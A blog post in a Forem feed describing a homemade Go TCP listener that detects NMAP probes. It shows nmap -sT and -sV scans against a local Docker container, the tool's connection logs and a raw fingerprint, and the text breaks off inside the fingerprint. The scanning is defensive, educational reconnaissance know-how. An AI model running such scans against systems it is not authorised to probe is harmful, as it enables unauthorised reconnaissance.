The latest articles on Forem by Chris (@brompwnie). https://forem.com/brompwnie https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F316164%2F59866453-7d78-48bb-b417-c74bddfe5ec3.jpg https://forem.com/brompwnie en Chris Tue, 01 Aug 2023 08:04:04 +0000 https://forem.com/brompwnie/analyzing-nmap-scans-for-fun-profit-and-understanding-part-1-gb9 https://forem.com/brompwnie/analyzing-nmap-scans-for-fun-profit-and-understanding-part-1-gb9 <h1> CAVEAT: This post is a few years old, its been sitting in my draft folder since 2021. </h1> <h1> Introduction </h1> <p>In this post, I'm going to describe a tool that I created which can be used to analyse and react to TCP data sent by NMAP scan probes. The analysis of NMAP scan probes can be used to answer questions like "What does an NMAP scan look like on the TCP stack?" or "How can I identify NMAP scans on my network?". Also let me add that this is not "new" research, analysing NMAP and its probes has been done many times before. I'm a fan of reinventing the wheel for my own amusement which generally helps me understand things better and of course, it's been a while since I've seen any new NMAP deep-dives. Enjoy :)</p> <p>The analysis of the NMAP probes can be used as a detection canary that can be used by blue-teamers to identify if an actor is running NMAP scans on their network infrastructure. Additionally, the analysis of NMAP probes can be used by red-teamers to understand how their tools behave and "look on the wire".</p> <p>Okay that was a lot for an introduction so let's break the tool down and see what it does.</p> <h3> TCP Socket Handling </h3> <p>First and foremost, this tool is essentially a multi-threaded TCP socket server. This functionality is used by the tool so that NMAP scans can be directed at the tool and the operator of the tool can observe the behaviour of the TCP socket connections made by NMAP. NMAP makes use of threads so by making the tool able to handle multiple connections concurrently. This is super useful because you can process all the connection probes made by NMAP. Let's go ahead and run the tool and scan it with some NMAP defaults.</p> <p>NOTE: I am running all of this in Docker and the tool is configured via Environmental variables.</p> <p>In one Docker container, build and run the tool to listen on port 80 and set TERM=nmap. "TERM" is the search term(string) we tell the tool to look for in the TCP data received:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@78b5ecfeb870:/work# export PORT=80 root@78b5ecfeb870:/work# export TERM=nmap root@78b5ecfeb870:/work# go build -o garbanzo &amp;&amp; ./garbanzo 2020/06/10 12:02:40 $GARBANZO_WEB must be set 2020/06/10 12:02:40 $GARBANZO_HOST must be set 2020/06/10 12:02:40 [+] Initialised Listener on Port: 80 </code></pre> </div> <p>And in another Docker container, we launch an NMAP scan against the server container which has the IP address 172.17.0.2. We are using the "-sT" flag because we are in a non-privileged container and do not have the required Linux Capabilities to create raw sockets [1].<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@f5f84eb31bc0:# nmap -sT 172.17.0.2 Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-02 UTC Nmap scan report for 172.17.0.2 Host is up (0.00014s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http </code></pre> </div> <p>and after the scan is done, we can see that NMAP detected port 80 to be open, which is correct.</p> <p>Our server output will look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@78b5ecfeb870:/work# export PORT=80 root@78b5ecfeb870:/work# export TERM=nmap root@78b5ecfeb870:/work# go build -o garbanzo &amp;&amp; ./garbanzo 2020/01/01 12:12:12 $GARBANZO_WEB must be set 2020/01/01 12:12:12 $GARBANZO_HOST must be set 2020/01/01 12:12:12 [+] Initialised Listener on Port: 80 2020/01/01 12:12:12 [+] [d5eff754572a65e648960245a43eba98beb0ce714c4d7dd95d7278a7063acbfb] Port:80 Connection:1 from:172.17.0.3:49106 2020/01/01 12:12:12 [ERROR] [d5eff754572a65e648960245a43eba98beb0ce714c4d7dd95d7278a7063acbfb] read tcp4 172.17.0.2:80-&gt;172.17.0.3:49106: read: connection reset by peer </code></pre> </div> <p>The output above from the tool indicates that a single TCP connections was made to port 80 and error occurred when the server attempted to read data from the stream. The error is expected because NMAP by default will reset the connect if it can make a connection. This is all the info NMAP needs to determine if a port is open, if it can successfully open a connection, then it must be open. In the output above, there is a SHA256 hash "d5eff754572a65e648960245a43eba98beb0ce714c4d7dd95d7278a7063acbfb" which is a unique identifier for the connection. This is useful for when there are multiple connections. The tool uses this hash with all activities associated to a connection. We'll see more of this in the section.</p> <h3> NMAP Service and Version Detection </h3> <p>Let's now use the "-sV" flag with our NMAP command as we want NMAP to try and extract "metadata" or the service and version of the open ports. This is useful from an attackers perspective because we want to gather as much information as possible on our target. We can try this by running the following command from our NMAP container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@f5f84eb31bc0:/go# nmap <span class="nt">-sT</span> <span class="nt">-sV</span> 172.17.0.2 <span class="nt">-p</span> 80 Starting Nmap 7.70 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-02-02 UTC Nmap scan report <span class="k">for </span>172.17.0.2 Host is up <span class="o">(</span>0.00014s latency<span class="o">)</span><span class="nb">.</span> </code></pre> </div> <p>And below is the corresponding output generated by the tool:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] Initialised Listener on Port: 80 <span class="o">[</span>+] <span class="o">[</span>2b24f34f93697ce707cd9d61323b70a2b54457c3dd330f7d5e5d7bd4ebbb8f66] Port:80 Connection:1 from:172.17.0.3:51198 <span class="o">[</span>ERROR] <span class="o">[</span>2b24f34f93697ce707cd9d61323b70a2b54457c3dd330f7d5e5d7bd4ebbb8f66] <span class="nb">read </span>tcp4 172.17.0.2:80-&gt;172.17.0.3:51198: <span class="nb">read</span>: connection reset by peer <span class="o">[</span>+] <span class="o">[</span>8297b9be5c9314c96c57af36e56dd5b14cf32884a16227906199ca8ddf8ee431] Port:80 Connection:2 from:172.17.0.3:51200 <span class="o">[</span>+] <span class="o">[</span>02210c50dac4565cb66cb1623623b9e4efe9d5638e666160e25769458679ee6d] Port:80 Connection:3 from:172.17.0.3:51202 <span class="o">[</span>+] <span class="o">[</span>14746282e65da35beba19df6fa78bde2419b8a16e072a1a95ad8bc807f5f9716] Port:80 Connection:4 from:172.17.0.3:51204 <span class="o">[</span>+] <span class="o">[</span>74264732650f84c3084ed23f15be3aa6290e3faf1289ce276bd20b0c3a168cf5] Port:80 Connection:5 from:172.17.0.3:51206 <span class="o">[</span>+] <span class="o">[</span>2cb82e31bbb4b06ad2c3ccb234e07a8aec8c5c75e046af3096740260842e4bac] Port:80 Connection:6 from:172.17.0.3:51208 <span class="o">[</span>+] <span class="o">[</span>51be251174fd9ee7424ba7a27bf512c2f2097f285dd46ca212240ae4209587d9] Port:80 Connection:7 from:172.17.0.3:51210 <span class="o">[</span>+] <span class="o">[</span>9e5be1a5dce881f7ba3ef51d5a66b2f17f2fb7014b0324d14ff8e273248a044c] Port:80 Connection:8 from:172.17.0.3:51212 <span class="o">[</span>+] <span class="o">[</span>31f2d6fb2c6b769be4948a987deb4a62d2f67392c86d6faa7d1e4bd02c174254] Port:80 Connection:9 from:172.17.0.3:51214 <span class="o">[</span>+] <span class="o">[</span>6dd8b57b9bd35fea1490b872c6c729d9bc882e3af29f1b24993749921eb5e0fd] Port:80 Connection:10 from:172.17.0.3:51216 <span class="o">[</span>+] <span class="o">[</span>d1fc77dbec734b6958203c3102bf98c2562539e9825216e200b3bdce0211e3f2] Port:80 Connection:11 from:172.17.0.3:51218 <span class="o">[</span>+] <span class="o">[</span>635da8a96fe12207e71977854eb49e95fa315a3ec712da9e79bda4aa03338273] Port:80 Connection:12 from:172.17.0.3:51220 <span class="o">[</span>+] <span class="o">[</span>ed6270327f3ef77886ea3e4cb6c07866d0750154f38ad1f21f2ffce7ddef70b7] Port:80 Connection:13 from:172.17.0.3:51222 <span class="o">[</span>+] <span class="o">[</span>4099a9996900ca19503a60b0434ce295ebb7400ad7f84002f16be2a47dacbb68] Port:80 Connection:14 from:172.17.0.3:51224 <span class="o">[</span>+] <span class="o">[</span>1dab93852e0749e263bb9c5deca00fed53fe8a5001b719d116016ed7d1d43e81] Port:80 Connection:15 from:172.17.0.3:51226 <span class="o">[</span>+] <span class="o">[</span>f2354e58c621369521f4de50a0b7d430b3bc79f395ea237ac5ca2f979e638353] Port:80 Connection:16 from:172.17.0.3:51228 <span class="o">[</span>+] <span class="o">[</span>f442e24b6110226e818d96c399b8cb56c8936381df4126ba80101f4c8ac6a1cd] Port:80 Connection:17 from:172.17.0.3:51230 <span class="o">[</span>+] <span class="o">[</span>0bd2ae1db2c1c1544af266eeba31f7ed6ee24ad7582f24a6c9a50735dd9747e2] Port:80 Connection:18 from:172.17.0.3:51232 <span class="o">[</span>+] <span class="o">[</span>628883d43eec1ce919a06b7dc39ed8962918f14342d2f389fda82e3bac6e1888] Port:80 Connection:19 from:172.17.0.3:51234 <span class="o">[</span>+] <span class="o">[</span>18d9fb07f6254ff16a27159a0c8f4d6d4d729de94a0f1361a10347c6265729fd] Port:80 Connection:20 from:172.17.0.3:51236 <span class="o">[</span>+] <span class="o">[</span>5f5660a93b7802af41fc135f0bb1e4cd4cec0f19d9875ba194aeb3518423ff9c] Port:80 Connection:21 from:172.17.0.3:51238 <span class="o">[</span>+] <span class="o">[</span>0f2d4808a0826f65efcb2491efe957835a5b18853dae03cc5e8d1957919b6cf8] Port:80 Connection:22 from:172.17.0.3:51240 <span class="o">[</span>+] <span class="o">[</span>39c77dc5d34efd2871b8315a5e0778e31ff4a124a4bcd91345047ce666375f43] Port:80 Connection:23 from:172.17.0.3:51242 <span class="o">[</span>+] <span class="o">[</span>b041e718af47ea6c851c9a5cbaf50290a47099c327b3ffcbfaedffc970ff73d5] Port:80 Connection:24 from:172.17.0.3:51244 <span class="o">[</span>+] <span class="o">[</span>346cbcbc95c1ae7f2fc82acb85d6e8a51ab44a7c894929843d8740ba6feebc2a] Port:80 Connection:25 from:172.17.0.3:51246 <span class="o">[</span>+] <span class="o">[</span>6128ee2cbdb3618ed21e147e8874fc7a534e0f1da4c8286de7d0012646cadebb] Port:80 Connection:26 from:172.17.0.3:51248 <span class="o">[</span>+] <span class="o">[</span>098a8bee69382aabb4acd7130e7c66791666e5fa189902ef17f1cd44cf223b1b] Port:80 Connection:27 from:172.17.0.3:51250 <span class="o">[</span>+] <span class="o">[</span>eeb53a2542d3ea71f725353cf8b1d064ab11e8667eb29e023124b6103aa097ae] Port:80 Connection:28 from:172.17.0.3:51252 <span class="o">[</span>+] <span class="o">[</span>875091a5aabf395a62db73a49c0f844d6f4cde28cdc0bf27b0346f6de4be299b] Port:80 Connection:29 from:172.17.0.3:51254 <span class="o">[</span>+] <span class="o">[</span>effa187e4a8757b2356bc23fdac4c28b2fc9b3dd6983538d3b9c3fd7c30bb764] Port:80 Connection:30 from:172.17.0.3:51256 <span class="o">[</span>+] <span class="o">[</span>0600560cc19cdf6185663d128ebaee3550cdf4a17ceb5a89c68500d9593a6d46] Port:80 Connection:31 from:172.17.0.3:51258 <span class="o">[</span>+] <span class="o">[</span>2e3fe6ada0d67914119272dcf6f9b7367b841b2773c8999a341b09120cd6cfd9] Port:80 Connection:32 from:172.17.0.3:51260 <span class="o">[</span>+] <span class="o">[</span>8a7ced242e7d833644403eec43543f0b2250af048b594e1dd96c12ac148b4f1d] Port:80 Connection:33 from:172.17.0.3:51262 <span class="o">[</span>+] <span class="o">[</span>8a7ced242e7d833644403eec43543f0b2250af048b594e1dd96c12ac148b4f1d] nmap Probe:1 from connection: 33 :[GET /nmaplowercheck1591880218 HTTP/1.1 <span class="o">][</span>474554202f6e6d61706c6f776572636865636b3135393138383032313820485454502f312e310d0a] <span class="o">[</span>+] <span class="o">[</span>d30f053fbd9b19ddf4ceb2fc4a43f900584ad7f58130ebb7c16f634701ab00ef] Port:80 Connection:34 from:172.17.0.3:51264 <span class="o">[</span>+] <span class="o">[</span>b4ac67dec3cc4c117e69057b5edc7e71350c0d2ccba6c8369159a589ccaf1285] Port:80 Connection:35 from:172.17.0.3:51266 <span class="o">[</span>+] <span class="o">[</span>b4ac67dec3cc4c117e69057b5edc7e71350c0d2ccba6c8369159a589ccaf1285] nmap Probe:2 from connection: 35 :[GET /nmaplowercheck1591880218 HTTP/1.1 <span class="o">][</span>474554202f6e6d61706c6f776572636865636b3135393138383032313820485454502f312e310d0a] <span class="o">[</span>+] <span class="o">[</span>5db9eee927b2f08180debcbc69e626fd31cbbd2b78d038fc9077e47c5eeb556e] Port:80 Connection:36 from:172.17.0.3:51268 <span class="o">[</span>+] <span class="o">[</span>cf407790610951aa8966c88322aa0a3e7d46f4ace9cc89e8427acdf5bfbcdf0d] Port:80 Connection:37 from:172.17.0.3:784 </code></pre> </div> <p>Woah okay that's a lot of output, lets break it down and see what it says. Firstly, we can see that NMAP made a total of 37 connections to the tool<br> <br> <code>...Port:80 Connection:37...</code><br> <br> . We can also see that the tool identified probes that contained our search "term" which we set to "nmap". Remember, this term basically tells the tool to search for that character sequence (case insensitive btw) in any data sent from the client (NMAP). Here's the first probe that the tool detected:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>... <span class="o">[</span>+] <span class="o">[</span>8a7ced242e7d833644403eec43543f0b2250af048b594e1dd96c12ac148b4f1d] Port:80 Connection:33 from:172.17.0.3:51262 <span class="o">[</span>+] <span class="o">[</span>8a7ced242e7d833644403eec43543f0b2250af048b594e1dd96c12ac148b4f1d] nmap Probe:1 from connection: 33 :[GET /nmaplowercheck1591880218 HTTP/1.1][474554202f6e6d61706c6f776572636865636b3135393138383032313820485454502f312e310d0a] <span class="o">[</span>+] <span class="o">[</span>d30f053fbd9b19ddf4ceb2fc4a43f900584ad7f58130ebb7c16f634701ab00ef] Port:80 Connection:34 from:172.17.0.3:51264 ... </code></pre> </div> <p>From the output above, we can see that it was connection 33 that sent the request that contained an HTTP request that contained the term "nmap". Okay that's interesting, we now know that behaves differently with the -sV flag in terms of the amount of TCP connections made and the data sent from NMAP. We can also see that NMAP continues the behaviour of "connecting" and "resetting" the connection first to determine if the port is opened, this can be seen with the following output specifically:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] Initialised Listener on Port: 80 <span class="o">[</span>+] <span class="o">[</span>2b24f34f93697ce707cd9d61323b70a2b54457c3dd330f7d5e5d7bd4ebbb8f66] Port:80 Connection:1 from:172.17.0.3:51198 <span class="o">[</span>ERROR] <span class="o">[</span>2b24f34f93697ce707cd9d61323b70a2b54457c3dd330f7d5e5d7bd4ebbb8f66] <span class="nb">read </span>tcp4 172.17.0.2:80-&gt;172.17.0.3:51198: <span class="nb">read</span>: connection reset by peer <span class="o">[</span>+] <span class="o">[</span>8297b9be5c9314c96c57af36e56dd5b14cf32884a16227906199ca8ddf8ee431] Port:80 Connection:2 from:172.17.0.3:51200 </code></pre> </div> <p>Below is the NMAP out from the scan we just analysed:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sT</span> <span class="nt">-sV</span> 172.17.0.2 <span class="nt">-p</span> 80 Starting Nmap 7.70 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020 UTC Nmap scan report <span class="k">for </span>172.17.0.2 Host is up <span class="o">(</span>0.000099s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 80/tcp open http? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V<span class="o">=</span>7.70%I<span class="o">=</span>7%D<span class="o">=</span>6/11%Time<span class="o">=</span>5EE229CA%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>GetR SF:equest,1F,<span class="s2">"{</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">c9NKo3</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">c7Bs</span><span class="se">\x</span><span class="s2">a3</span><span class="se">\t</span><span class="s2">I</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">90Y</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\)\x</span><span class="s2">94h</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">aaD</span><span class="se">\</span><span class="s2"> SF:xbc</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">b2</span><span class="se">\x</span><span class="s2">85</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">ff"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions,85,<span class="s2">"</span><span class="se">\(\x</span><span class="s2">1f</span><span class="se">\x</span><span class="s2">ce</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">f5</span><span class="se">\</span><span class="s2"> SF:xa4</span><span class="se">\x</span><span class="s2">fa!y</span><span class="se">\x</span><span class="s2">1e</span><span class="se">\x</span><span class="s2">d4;2</span><span class="se">\^\x</span><span class="s2">d9;Y</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">1eAO</span><span class="se">\"\x</span><span class="s2">10&amp;W</span><span class="se">\x</span><span class="s2">f1VUj</span><span class="se">\x</span><span class="s2">d3{8</span><span class="se">\x</span><span class="s2">e2h</span><span class="sb">`</span><span class="se">\x</span>9 SF:9<span class="se">\0</span>s<span class="se">\x</span>01s5oC_<span class="se">\x</span>1fu<span class="se">\x</span><span class="nb">cd</span><span class="se">\x</span>b9<span class="se">\x</span>c4<span class="se">\*</span>wS&amp;<span class="s1">'\x9d\xe3A&lt;\xf5\xba\xa9\xe4\x9fQ\xdb SF:\xf7\(P\x95\xc8NL\xdf@9\xc0\x04g\x1a\xad\xbd\xefh=\x89\x18'</span>v<span class="se">\x</span><span class="nb">fc</span><span class="se">\x</span>a0t<span class="se">\x</span> SF:02<span class="se">\x</span>ce<span class="se">\x</span>b1<span class="se">\x</span>f8<span class="se">\x</span>1d<span class="se">\x</span>18<span class="se">\x</span>cb<span class="se">\x</span>98I<span class="se">\x</span>85<span class="se">\x</span>e0O<span class="se">\x</span>a4B<span class="se">\x</span>a7<span class="se">\|\x</span>11<span class="se">\x</span>ad<span class="se">\x</span>ec<span class="se">\x</span>c9<span class="se">\x</span>f1 SF:<span class="se">\x</span>93<span class="se">\x</span>ceu<span class="se">\x</span>80<span class="se">\x</span>8c<span class="se">\x</span>17p<span class="se">\x</span>ed<span class="se">\x</span>felf<span class="se">\x</span>b0<span class="se">\x</span>1f<span class="se">\x</span>8bM<span class="se">\x</span>f4<span class="se">\x</span>8fw<span class="se">\x</span>ff<span class="s2">")%r(RTSPRequ SF:est,26,"</span><span class="se">\x</span>dc<span class="se">\x</span>a5<span class="se">\x</span>8ar<span class="se">\x</span>e7<span class="se">\x</span>97<span class="se">\)\x</span>9f<span class="se">\x</span>cc<span class="se">\x</span>07<span class="se">\x</span>e2h<span class="se">\x</span>c6hG0<span class="se">\x</span>12<span class="se">\x</span>cc<span class="se">\x</span>aa<span class="se">\x</span>b6 SF:<span class="se">\x</span>9dj<span class="se">\x</span>008<span class="se">\x</span>a7<span class="se">\x</span>8d<span class="se">\x</span>fd<span class="se">\t\x</span>cf<span class="se">\x</span>e9U<span class="se">\x</span>c3<span class="se">\x</span>9e<span class="sb">`</span><span class="se">\x</span><span class="s2">96l</span><span class="se">\x</span><span class="s2">93</span><span class="se">\x</span><span class="s2">ff"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourR SF:equest,15F,<span class="s2">"</span><span class="se">\x</span><span class="s2">80V</span><span class="se">\x</span><span class="s2">f84</span><span class="se">\x</span><span class="s2">99V1g</span><span class="se">\x</span><span class="s2">d3,</span><span class="se">\x</span><span class="s2">cf</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">dd</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">86</span><span class="se">\x</span><span class="s2">17</span><span class="se">\r</span><span class="s2">L</span><span class="se">\x</span><span class="s2"> SF:af</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">a3</span><span class="se">\x</span><span class="s2">e10</span><span class="se">\x</span><span class="s2">fes</span><span class="se">\x</span><span class="s2">cd7K</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">b6</span><span class="se">\x</span><span class="s2">b2</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">92</span><span class="se">\x</span><span class="s2">9a</span><span class="se">\x</span><span class="s2">cc</span><span class="se">\|</span><span class="s2">CHB</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">ac</span><span class="se">\x</span><span class="s2">b6 SF:Y%_</span><span class="se">\x</span><span class="s2">0e</span><span class="se">\x</span><span class="s2">18</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">91</span><span class="se">\x</span><span class="s2">0bz</span><span class="se">\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2">bb</span><span class="se">\^\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">edy SF:Z</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">f2t</span><span class="se">\x</span><span class="s2">c5ab</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">bb</span><span class="se">\x</span><span class="s2">05</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">0b&gt;</span><span class="se">\x</span><span class="s2">feY</span><span class="se">\x</span><span class="s2">9c</span><span class="se">\x</span><span class="s2">10Cg</span><span class="se">\x</span><span class="s2">ca</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">8 SF:4X</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\"</span><span class="s2">B}</span><span class="se">\)\?\+\"</span><span class="s2">%</span><span class="se">\x</span><span class="s2">9b</span><span class="se">\x</span><span class="s2">db</span><span class="se">\|\x</span><span class="s2">d2gzp</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\\\x</span><span class="s2">fe</span><span class="se">\x</span><span class="s2">13</span><span class="se">\x</span><span class="s2">ddQ</span><span class="se">\+</span><span class="s2">5</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">7fR</span><span class="se">\x</span><span class="s2">d2 SF:6Q</span><span class="se">\x</span><span class="s2">7f!5</span><span class="se">\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">81y</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">cc</span><span class="se">\[\x</span><span class="s2">c6Lu</span><span class="se">\x</span><span class="s2">fd</span><span class="se">\x</span><span class="s2">c7o</span><span class="se">\x</span><span class="s2">acO</span><span class="se">\x</span><span class="s2">e2L</span><span class="se">\x</span><span class="s2">b SF:a</span><span class="se">\x</span><span class="s2">08M</span><span class="se">\x</span><span class="s2">f8m</span><span class="se">\x</span><span class="s2">89x</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">cd&amp;</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">edW_</span><span class="se">\x</span><span class="s2">e5</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">fa'rT</span><span class="se">\x</span><span class="s2">b1QXr</span><span class="se">\x</span><span class="s2">b8R</span><span class="se">\</span><span class="s2"> SF:xc1</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">d4</span><span class="se">\x</span><span class="s2">c8</span><span class="se">\x</span><span class="s2">d31</span><span class="se">\x</span><span class="s2">83</span><span class="se">\?\x</span><span class="s2">13</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">92</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">7fBz</span><span class="se">\x</span><span class="s2">1f</span><span class="se">\x</span><span class="s2">92</span><span class="se">\x</span><span class="s2">d6</span><span class="se">\x</span><span class="s2">15</span><span class="se">\x</span><span class="s2">1 SF:2I</span><span class="se">\x</span><span class="s2">a8</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">9e</span><span class="se">\x</span><span class="s2">ebR</span><span class="se">\x</span><span class="s2">c8</span><span class="se">\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">9b</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">1a</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">1fb</span><span class="se">\0\x</span><span class="s2">b3a8R</span><span class="se">\x</span><span class="s2"> SF:ab</span><span class="se">\t\x</span><span class="s2">a4</span><span class="se">\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">a7C5</span><span class="se">\x</span><span class="s2">ac</span><span class="se">\0\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">bdG</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">e8BgG</span><span class="se">\\\x</span><span class="s2">05/</span><span class="se">\x</span><span class="s2">0b SF:j</span><span class="se">\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">99E</span><span class="se">\x</span><span class="s2">81</span><span class="se">\n\]\x</span><span class="s2">c5</span><span class="se">\x</span><span class="s2">f80</span><span class="se">\x</span><span class="s2">a0</span><span class="se">\]\x</span><span class="s2">9e</span><span class="se">\x</span><span class="s2">fc</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\x</span><span class="s2">066&amp;</span><span class="se">\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">a0d</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">8 SF:3</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\(</span><span class="s2">=,oO</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">ac/4</span><span class="se">\x</span><span class="s2">f52</span><span class="se">\x</span><span class="s2">a2</span><span class="se">\)\x</span><span class="s2">cbT</span><span class="se">\x</span><span class="s2">a8</span><span class="se">\x</span><span class="s2">c8</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">e5</span><span class="se">\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2"> SF:90</span><span class="se">\x</span><span class="s2">a1j</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">19</span><span class="se">\t\x</span><span class="s2">b3P</span><span class="se">\x</span><span class="s2">a7</span><span class="se">\^\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">dfz</span><span class="se">\$</span><span class="s2">c</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\"</span><span class="s2">,</span><span class="se">\x</span><span class="s2">e0</span><span class="se">\x</span><span class="s2">f7 SF:</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\x</span><span class="s2">18</span><span class="se">\x</span><span class="s2">ba</span><span class="se">\x</span><span class="s2">a7</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">87</span><span class="se">\x</span><span class="s2">dd</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">cdw</span><span class="se">\x</span><span class="s2">cc</span><span class="se">\x</span><span class="s2">c7R</span><span class="se">\x</span><span class="s2">8a</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">b4</span><span class="se">\*\r\</span><span class="s2"> SF:xbe:</span><span class="se">\x</span><span class="s2">c2o;1</span><span class="se">\x</span><span class="s2">0f8</span><span class="se">\x</span><span class="s2">94E</span><span class="se">\r</span><span class="s2">mY</span><span class="se">\t</span><span class="s2">s</span><span class="se">\x</span><span class="s2">c7</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">9e</span><span class="se">\x</span><span class="s2">ff"</span><span class="o">)</span>%r<span class="o">(</span>GenericLines,20,<span class="s2">"5</span><span class="se">\x</span><span class="s2">d7 SF:</span><span class="se">\x</span><span class="s2">9c&gt;</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\n</span><span class="s2">ep</span><span class="se">\*\x</span><span class="s2">d3</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">f5</span><span class="se">\x</span><span class="s2">8f</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">aa</span><span class="se">\x</span><span 